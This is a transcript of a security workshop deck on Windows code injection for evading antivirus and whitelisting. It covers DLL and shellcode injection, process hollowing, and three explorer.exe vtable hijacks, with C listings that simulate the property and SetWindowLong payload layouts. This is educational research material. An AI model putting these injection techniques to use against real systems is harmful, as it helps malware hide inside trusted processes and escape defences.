
TDOHConf Workshop 2018: Playing Malware Injection with Exploit thoughts

adr
September 28, 2018


When attackers want to get past anti-virus software or the whitelist protection of system-hardening products, they have traditionally turned to malicious code injection: the malicious code is injected into a whitelisted system service and executed there, so that it is never seen by the AV engine or the whitelist enforcement.

To inject code, attackers usually rely on RunPE, AtomBombing, cross-process thread creation and similar techniques, which let the attacker's code pose as any critical system service. As anti-virus vendors have improved, these sensitive techniques are increasingly caught by proactive (behavioural) defences. But what if the operating system's critical services are themselves already riddled with holes? Attacker tradecraft keeps getting more refined, and the battle has moved into memory.

This session briefly covers PowerLoaderEx, a new memory-level injection technique that appeared after 2013, and, building on the same idea, discloses three injection techniques that have never been published online. They abuse memory-level weaknesses in critical Windows components to inject malicious behaviour into critical system services. The content covers reverse engineering of Windows system binaries, analysis of the memory weaknesses, and how to implement and exploit them.

Transcript

  1. Workshop ⚐
    Playing Malware Injection
    with Exploit thoughts
    TDOHConf 2018, [email protected]

  2. >_cat ./Bio
    • Master degree at CSIE, NTUST
    • Security Researcher - chrO.ot, TDOHacker
    • Speaker
    - BlackHat, DEFCON, beVX, VXCON, HITCON

  3. >_cat ./lab
    • Recap
    • Malware Injection
    • Lab #1 - Basic Injection
    • Abuse the demon of Windows
    • Lab #2 - Ole32 DropEnter Event
    • Lab #3 - Comctl32 SubClass Event
    • Lab #4 - Extra Window Vulnerability aka PowerLoader

  4. >_ls ./env
    • Windows 7 x86
    • IDA (Demo Version)
    • Visual Studio CMT
    • Chrome
    • x64dbg
    • Lab File x4

  5. [email protected]
    Recap: Ma1w4re !nj3cti0n

  6. >_Win32 API
    (diagram) The path of a Win32 API call from user mode into the kernel:
    malware (.text section) -> kernel32.dll (.text section) -> ntdll.dll (.text section)
    -> KiFastSystemCall: eax = function (system-call) index, _asm { sysenter }
    -> Windows Kernel (Ring0)

  7. >_Blindspot
    (diagram) The same path once the malware code runs inside another process ("Messenger"):
    Malware Code -> Messenger .text section (RegOpenKey, WriteProcessMemory, DeleteFileA, ...)
    -> ntdll.dll .text section -> Windows Kernel (Ring0)
    The system calls are now issued by the whitelisted process, so the original malware is never seen making them.

  8. >_man inject
    (`_´)ゞ Used for bypassing whitelist checking, bypassing
    anti-virus, privilege escalation, etc.
    e.g.
    • DLL Side-Loading + Digital Signature = Bypassing anti-virus
    • Remote Inject + whitelisted process = Bypassing whitelist
    • Inject explorer + DLL Side-Loading + Self-elevate Service
    = Bypassing Windows UAC (User Account Control) *Vista ~ Win8*

  9. >_man inject
    There are several well-known techniques
    • Shellcode Inject or DLL Inject - OpenProcess, VirtualAllocEx (RWX),
    WriteProcessMemory, CreateRemoteThread
    • Process Hollowing (aka RunPE) - OpenProcess, CreateProcessA with CREATE_SUSPENDED,
    map the PE file with VirtualAllocEx + WriteProcessMemory, GetThreadContext/SetThreadContext, and
    ResumeThread to execute the exe file from memory
    • Thread Hijack or AtomBombing - QueueUserAPC, Inline Hook, or IAT
    Hijack
    • Memory Exploit (PowerLoaderEx) - SetWindowLong, SendNotifyMessage

  10. >_man inject
    There are 4 primary challenges in injection:
    1. What's the target - choose a process to inject into, and it should be
    meaningful. e.g. explorer, svchost
    2. Where to place it - find memory in the target to hold an RWX payload or a
    ROP-chain payload. e.g. VirtualAllocEx
    3. How to inject the payload - any way to write the payload into the
    remote process's memory. e.g. WriteProcessMemory
    4. How to run it - create a new thread to execute it, or hijack a
    current thread of that process?

  11. [email protected]
    !nJ3ct!0n Lab:
    From zero to Exploit.

  12. [email protected]
    Lab #1
    Shellcode Injection

  13. >_Process
    (diagram) A process holds the application's .text section, ntdll.dll's .text section, the .data and .bss
    sections and stack memory. Each thread (#0 main thread, #1 thread, #2 thread) has its own stack register
    and program counter (eip).

  14. >_Process
    (same diagram as slide 13, shown before the program counter is introduced)

  15. >_Intel x86 EIP
    EIP (x86), RIP (x86_64), program counter, or the
    instruction pointer, is a special-purpose register which
    stores a pointer to the address of the instruction that
    is currently executing. Making a jump is like adding to
    or subtracting from the instruction pointer.
    wiki.skullsecurity.org/index.php?title=Registers#eip

  16. >_CreateRemoteThreadEx
    Creates a thread that runs in the virtual address space of another
    process and optionally specifies extended attributes such as
    processor group affinity.
    docs.microsoft.com/zh-tw/windows/desktop/api/processthreadsapi/nf-processthreadsapi-createremotethreadex

  17. (screenshot only)

  18. >_Remote Access Token?

  19. >_It doesn't work?
    User Interface Privilege Isolation (UIPI) is a technology
    introduced in Windows Vista and Windows Server 2008 to
    combat shatter attack exploits.
    By making use of Mandatory Integrity Control, it prevents
    processes with a lower "integrity level" (IL) from
    sending messages to higher IL processes (except for a
    very specific set of UI messages).

  20. >_It doesn't work?
    Window messages are designed to communicate user action
    to processes.
    However, they can be used to run arbitrary code in the
    receiving process' context. This can be used by a
    malicious low IL process to run arbitrary code in the
    context of a higher IL process, which constitutes an
    unauthorized privilege escalation.
    By restricting access to some vectors for code execution
    and data injection, UIPI can mitigate these kinds of
    attacks.
    Note that the labs below target explorer.exe, which runs at the same
    (medium) integrity level as an ordinary user process, so UIPI does not
    stand between the injector and its target; the same primitives are
    blocked when the target window belongs to a higher IL process.

  21. [email protected]
    Lab #1.1
    DLL Injection

  22. >_Memory
    (diagram) Three processes side by side (Malware.exe, Messenger.exe, Chrome.exe), each mapping
    Ntdll.dll, Kernel32.dll, User32.dll, ... at the same addresses, each with its own stack memory;
    low addresses at the top, high addresses at the bottom; labelled "Fixed ASLR".
    Actually, system modules are located at the same
    addresses even in different processes, even though ASLR
    protection is enabled by default since Windows 7: the base
    of a system DLL is randomized once per boot, not once per
    process. It means every system API function is placed at a
    predictable address, so the address of LoadLibraryA in the
    injector is also its address in the target.

  23. >_LoadLibraryA
    Loads the specified module into the address space of the calling
    process. The specified module may cause other modules to be loaded.
    msdn.microsoft.com/zh-tw/library/windows/desktop/ms684175(v=vs.85).aspx

  24. >_CreateRemoteThreadEx
    Creates a thread that runs in the virtual address space of another
    process and optionally specifies extended attributes such as
    processor group affinity.
    docs.microsoft.com/zh-tw/windows/desktop/api/processthreadsapi/nf-processthreadsapi-createremotethreadex

  25. >_lpParameter
    A pointer to a variable to be passed to the thread function pointed
    to by lpStartAddress. This parameter can be NULL.
    docs.microsoft.com/zh-tw/windows/desktop/api/processthreadsapi/nf-processthreadsapi-createremotethreadex

  26. >_Goal⚐
    LoadLibraryA("\\\\127.0.0.1\\C$\\hackMudle.dll");   // the path \\127.0.0.1\C$\hackMudle.dll, backslashes escaped for a C string literal
    LoadLibraryA is used as the remote thread's start routine, so the thread
    takes exactly one pointer-sized argument: lpParameter has to point at the
    path string, which therefore must be written into the target process first.

  27. >_Dll Injection
    github.com/aaaddress1/Dll-Injector-In-CB/blob/master/Unit1.cpp

  28. [email protected]
    Lab #2
    Ole32 DropEnter Event

  29. >_IDA
    Open C$\Windows\System32\Ole32.dll with IDA, and analyze the
    function PrivDragDrop.

  30. >_Rebase
    Due to ASLR protection, it's necessary for us to rebase Ole32.dll in IDA
    to the base it has in the live process.
    We can use CheatEngine, PCHunter, Scylla, etc. to fetch
    the base address in explorer.

  31. >_Debug Active DLL
    We can debug a function inside the DLL in an active
    process dynamically now, after rebasing. ;)

  32. >_cat ./ole32_init
    (screenshot of the disassembly)

  33. >_cat ./reg_dropevent
    (screenshot of the disassembly)

  34. >_man LPDROPTARGET
    IDropTarget actually is a virtual method table :)

  35. >_issue?
    The IDropTarget pointer, and so its vtable, is resolved with GetProp(),
    so it's really easy for us to hijack the vtable just by calling SetProp() on the window.
    This callback is used to handle files dropped on the Start button of Explorer.exe.

  36. >_issue
    explorer Process Memory
    Prop Name: OleDropTargetInterface   Value: 0xbeef (originally the DropTarget @ 0xc0fee)
    payload @ 0xbeef
      +0  - 0xbeef (this: the object points at itself, so the same bytes also serve as its vtable)
      +4  - don't care
      +8  - don't care
      +0C - shellcode addr (the DragEnter slot: the first IDropTarget method after the three IUnknown slots on x86)
    It's easy for us to change the return value of
    GetPropW("OleDropTargetInterface") from 0xc0fee
    to 0xbeef (malicious payload).

  37. >_issue
    explorer Process Memory, with the layout of slide 36 in place
    1) The operating system sends the window message (Drag & Drop)
    2) explorer calls GetPropW("OleDropTargetInterface") and gets 0xbeef
    3) It invokes the drop handler from the vtable: shellcode addr = *(0xbeef + 0xC)

  38. >_abuse vtable
    (screenshot)

  39. (screenshot only)
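    The hijack of slides 35-37 as a single-process simulation, added here as an example rather than code from the deck: a stand-in for the window-property table replaces GetPropW/SetPropW, the IDropTarget vtable keeps the x86 slot order (QueryInterface, AddRef, Release, DragEnter, ...), and the attacker's object is its own vtable so that only the DragEnter slot at +0xC has to hold a real value. Lab #3's subclass chain is reached through the same kind of property lookup (FastGetSubclassHeader reads a header that was stored with SetProp), so the same primitive applies there. The helper names, the property table and the 0x1337 return value are constructed for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* A local stand-in for the window-property table that user32's GetPropW/SetPropW keep per HWND.
 * Only one window (explorer's Start button) is modelled, so the HWND is implicit. */
typedef struct { const char *name; void *value; } Prop;
static Prop g_props[8];

static void *sim_GetProp(const char *name)
{
    for (size_t i = 0; i < sizeof g_props / sizeof g_props[0]; i++)
        if (g_props[i].name && strcmp(g_props[i].name, name) == 0) return g_props[i].value;
    return NULL;
}

static int sim_SetProp(const char *name, void *value)
{
    const size_t n = sizeof g_props / sizeof g_props[0];
    size_t free_slot = n;
    for (size_t i = 0; i < n; i++) {
        if (g_props[i].name && strcmp(g_props[i].name, name) == 0) { g_props[i].value = value; return 1; }
        if (!g_props[i].name && free_slot == n) free_slot = i;
    }
    if (free_slot == n) return 0;
    g_props[free_slot].name = name;
    g_props[free_slot].value = value;
    return 1;
}

/* IDropTarget as slide 34 puts it: a pointer to a vtable. x86 slot offsets:
 * +0 QueryInterface, +4 AddRef, +8 Release, +0xC DragEnter, +0x10 DragOver, +0x14 DragLeave, +0x18 Drop. */
typedef struct IDropTarget IDropTarget;
typedef long (*Method)(IDropTarget *self);   /* the real methods take more arguments; the hijack does not care */
typedef struct { Method slot[7]; } DropTargetVtbl;
struct IDropTarget { const DropTargetVtbl *lpVtbl; };
enum { SLOT_DRAGENTER = 3 };

static int g_legit_calls, g_payload_calls;
static long method_noop(IDropTarget *self) { (void)self; return 0; }
static long legit_DragEnter(IDropTarget *self) { (void)self; g_legit_calls++; return 0; }
static const DropTargetVtbl g_legit_vtbl = {{ method_noop, method_noop, method_noop, legit_DragEnter, method_noop, method_noop, method_noop }};
static IDropTarget g_start_button_target = { &g_legit_vtbl };

/* What ole32 does: at registration it stores the interface pointer in a window property,
 * and on a drag-enter it reads the pointer back and trusts it. */
void ole32_register_drop_target(IDropTarget *target) { sim_SetProp("OleDropTargetInterface", target); }
void ole32_register_legit_target(void) { ole32_register_drop_target(&g_start_button_target); }

long explorer_on_drag_enter(void)
{
    IDropTarget *t = (IDropTarget *)sim_GetProp("OleDropTargetInterface");
    if (!t) return -1;
    return t->lpVtbl->slot[SLOT_DRAGENTER](t);            /* call *(*(t) + 0xC) on x86 */
}

/* The attacker's object from slide 36: its first field points back at itself, so the same bytes are read
 * both as the object and as its vtable, and only the DragEnter slot needs a meaningful value. */
typedef union {
    struct { const void *lpVtbl; } object;   /* +0: read as the object's vtable pointer */
    Method as_vtbl[7];                       /* the same bytes read as the vtable */
} FakeDropTarget;

static long payload(IDropTarget *self) { (void)self; g_payload_calls++; return 0x1337; }
static FakeDropTarget g_fake;

/* In the real attack the fake object and its shellcode must already reside in explorer (placed with any
 * technique from slide 9); SetPropW, which accepts any HWND at the same or lower integrity level, then delivers
 * only the pointer. Here everything lives in one process, so the "remote" object is a global. */
void attacker_hijack(void)
{
    g_fake.object.lpVtbl = &g_fake;
    g_fake.as_vtbl[SLOT_DRAGENTER] = payload;
    sim_SetProp("OleDropTargetInterface", &g_fake);
}

int main(void)
{
    ole32_register_legit_target();
    long before = explorer_on_drag_enter();
    attacker_hijack();
    long after = explorer_on_drag_enter();
    printf("DragEnter returned %ld before and 0x%lx after the hijack (legit=%d payload=%d)\n",
           before, after, g_legit_calls, g_payload_calls);
    return after == 0x1337 ? 0 : 1;
}
```

    Nothing in explorer's own memory is patched: the only state that changes is the property value, which is why restoring the original pointer with another SetProp undoes the hijack, and why a detection that diffs the OleDropTargetInterface property against the module range of ole32/explorer catches it.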

  40. [email protected]
    Lab #3
    Comctl32 SubClass Event

  41. >_IDA
    Open C$\Windows\System32\Comctl32.dll with IDA, and analyze the
    function MasterSubclassProc.

  42. >_IDA
    However, Micro$oft has patched comctl32.dll; the patched side-by-side copy lives at
    C$\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.
    We need to analyze this copy to understand how it works in the real world.

  43. >_Rebase
    Due to ASLR protection, it's necessary for us to rebase Comctl32 in IDA
    to the base it has in the live process.
    We can use CheatEngine, PCHunter, Scylla, etc. to fetch
    the base address in explorer.

  44. >_Debug Active DLL
    We can debug a function inside the DLL in an active
    process dynamically now, after rebasing. ;)

  45. >_cat FastGetSubclsHdr
    (screenshot of the disassembly)

  46. >_cat MstSubclsProc
    (screenshot of the disassembly)

  47. >_cat EnterSubclsFram
    (screenshot of the disassembly)

  48. >_cat EntrSubclsCallbk
    (screenshot of the disassembly)

  49. >_cat CallNxtSubclsProc
    (screenshot of the disassembly)

  50. >_abuse vtable
    (screenshot)

  51. >_abuse vtable
    (screenshot)

  52. (screenshot only)

  53. [email protected]
    Lab #4
    Extra Window Vulnerability

  54. >_IDA
    Open C$\Windows\Explorer with IDA, and analyze the function s_WndProc.

  55. >_CImpWndProc::s_WndProc
    (screenshot of the disassembly)

  56. >_Rebase
    Due to ASLR protection, it's necessary for us to rebase explorer in IDA
    to its live base before debugging it dynamically.
    We can use CheatEngine, PCHunter, Scylla, etc. to fetch
    the base address of explorer.

  57. >_Shell_TrayWnd?
    (screenshot)

  58. >_Shell_TrayWnd?
    Window event callback function

  59. [email protected]
    >_s_WndProc?

  60. [email protected]
    >_s_WndProc?

  61. >_how it works
    Explorer Process Memory
    Shell_TrayWnd object (its pointer is kept in the window's extra bytes)
      +0 - 0xcafe (vtable)
      +4 - window hwnd
      ...
    vtable @ 0xcafe
      +0 - Interlocked (inc)
      +4 - message callback
      +8 - Interlocked (inc)
    Operating System
    1) Send Window Message
    2) Send Window Message
    3) Invoke the s_WndProc function
    4) s_WndProc invokes several functions from the vtable

  62. >_issue?
    (same layout as slide 61) s_WndProc locates the object with GetWindowLong(),
    i.e. it reads the object pointer out of the window's extra bytes and trusts it.

  63. >_issue?
    SetWindowLong() from another process replaces the pointer GetWindowLong() returns,
    so the object s_WndProc sees now has vtable 0xbeef instead of 0xcafe:
    Shell_TrayWnd
      +0 - 0xbeef (was 0xcafe)
      +4 - window hwnd
      ...
    vtable @ 0xcafe (no longer reached)
      +0 - Interlocked (inc)
      +4 - message callback
      +8 - Interlocked (inc)
    fake vtable @ 0xbeef
      +0 - shellcode addr
      +4 - shellcode
      ...

  64. >_issue?
    Explorer Process Memory, after SetWindowLong(): GetWindowLong() now yields the
    malicious Shell_TrayWnd object, i.e. the payload, laid out relative to its own address $:
      +0 - fake vtable ($+4)
      +4 - shellcode addr ($+8)   <- fake vtable slot 0
      +8 - shellcode
    pwn!

  65. >_abuse vtable
    (screenshot)

  66. (screenshot only)
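    The slide-64 layout as a concrete builder, added here as an example and not code from the deck or from PowerLoaderEx: every link is precomputed relative to the delivery address so that a single SetWindowLong(hwnd, 0, dst) is all the target ever receives, and a second function walks the pointers the way slides 61-63 describe s_WndProc doing (window long -> object -> vtable -> slot 0). The delivery address, the 4-byte placeholder "shellcode" and the function names are constructed. If the memory the blob lands in is not executable, slot 0 has to point at a ROP chain rather than raw shellcode, which is what slide 67 refers to for the 64-bit attack; the builder does not change in that case, only the bytes behind dst+2w do.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Little-endian pointer helpers: the blob is built for the target's pointer width w
 * (4 on the Win7 x86 lab box, 8 on x64), which need not be the host's. */
static void put_ptr(uint8_t *p, size_t w, uint64_t v) { for (size_t i = 0; i < w; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static uint64_t get_ptr(const uint8_t *p, size_t w) { uint64_t v = 0; for (size_t i = 0; i < w; i++) v |= (uint64_t)p[i] << (8 * i); return v; }

/* Build the slide-64 blob for delivery to address `dst` inside explorer:
 *   dst+0  : lpVtbl        = dst + w     (the object's first field points at the fake vtable right behind it)
 *   dst+w  : vtable slot 0 = dst + 2w    (the first method s_WndProc calls through the vtable; AddRef on slide 61)
 *   dst+2w : shellcode (or a ROP chain when dst is not executable)
 * Only dst itself has to be passed to the target, via SetWindowLong(hwnd, 0, dst).
 * Returns the number of bytes used, or 0 if the arguments are invalid. */
size_t build_tray_payload(uint64_t dst, size_t w, const uint8_t *sc, size_t sc_len, uint8_t *out, size_t out_len)
{
    if ((w != 4 && w != 8) || sc_len == 0 || 2 * w + sc_len > out_len) return 0;
    if (w == 4 && dst + 2 * w + sc_len > 0x100000000ull) return 0;   /* must stay addressable on a 32-bit target */
    put_ptr(out, w, dst + w);
    put_ptr(out + w, w, dst + 2 * w);
    memcpy(out + 2 * w, sc, sc_len);
    return 2 * w + sc_len;
}

/* Follow the pointers exactly as slides 61-63 describe s_WndProc doing it, over a snapshot `mem` of target
 * memory that starts at address `mem_base`:
 *   obj  = GetWindowLong(hwnd, 0)    (the value the attacker stored)
 *   vtbl = *(ptr *)obj
 *   fn   = vtbl[0]
 * Returns the address that would be called, or 0 if a dereference leaves the snapshot. */
uint64_t simulate_s_WndProc(const uint8_t *mem, size_t mem_len, uint64_t mem_base, size_t w, uint64_t window_long_0)
{
    uint64_t obj = window_long_0;
    if (obj < mem_base || obj + w > mem_base + mem_len) return 0;
    uint64_t vtbl = get_ptr(mem + (obj - mem_base), w);
    if (vtbl < mem_base || vtbl + w > mem_base + mem_len) return 0;
    return get_ptr(mem + (vtbl - mem_base), w);
}

int main(void)
{
    /* Constructed inputs: a placeholder 4-byte "shellcode" (int3 x4) and an assumed delivery address in explorer. */
    static const uint8_t sc[] = { 0xCC, 0xCC, 0xCC, 0xCC };
    uint8_t blob[64];
    uint64_t dst = 0x00BEEF00ull;
    size_t n = build_tray_payload(dst, 4, sc, sizeof sc, blob, sizeof blob);
    uint64_t target = simulate_s_WndProc(blob, n, dst, 4, dst);
    printf("blob of %zu bytes; s_WndProc would call 0x%08llx (shellcode sits at 0x%08llx)\n",
           n, (unsigned long long)target, (unsigned long long)(dst + 8));
    return target == dst + 8 ? 0 : 1;
}
```

    Because the blob is position-dependent, it must be rebuilt whenever the delivery address changes; the bounds checks in simulate_s_WndProc also show what goes wrong if the window long is set before the bytes are in place, in which case the dereference chain simply does not resolve inside the snapshot.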

  67. >_Not Enough?
    • PowerLoader Injection - something truly amazing
    • A basic trick; more on the 64-bit attack
    • BreakingMalware/PowerLoaderEx (GitHub)
    • Pass the payload through the window's extra memory to explorer
    • Execute the payload on RW memory with a ROP chain

  68. Thanks.
    [email protected]
    Slide
    Github @aaaddress1
    Facebook